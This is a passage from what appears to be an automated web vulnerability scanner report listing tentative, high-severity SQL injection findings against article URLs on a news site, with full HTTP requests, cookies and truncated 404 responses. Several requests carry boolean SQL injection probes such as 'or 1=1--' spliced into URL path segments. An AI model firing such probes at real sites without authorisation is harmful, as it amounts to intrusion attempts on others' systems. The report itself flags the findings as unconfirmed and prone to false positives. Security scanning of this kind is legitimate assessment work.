                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2010%20and%201%3d2--%20/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1754540373&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1754540373&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

1.79. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 17360674%20or%201%3d1--%20 and 17360674%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010/0817360674%20or%201%3d1--%20/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39897

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=823962262&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=823962262&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2010/0817360674%20or%201%3d2--%20/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39909

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=906723894&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=906723894&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.80. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

Request 1

GET /_news/2010/08/16'%20and%201%3d1--%20/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:36:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39907

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1838711579&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1838711579&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/2010/08/16'%20and%201%3d2--%20/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:36:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39897

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=348724747&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=348724747&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.81. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console

Issue detail

Request 1

GET /_news/2010%20and%201%3d1--%20/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1942292609&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1942292609&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="
...[SNIP]...

Request 2

GET /_news/2010%20and%201%3d2--%20/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39899

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1829603836&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1829603836&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="
...[SNIP]...

1.82. http://technolog.msnbc.redacted/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up

Issue detail

Request 1

GET /_news/2011/01/24'%20and%201%3d1--%20/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1152911927&do=msnbc.msn.com&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1152911927&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
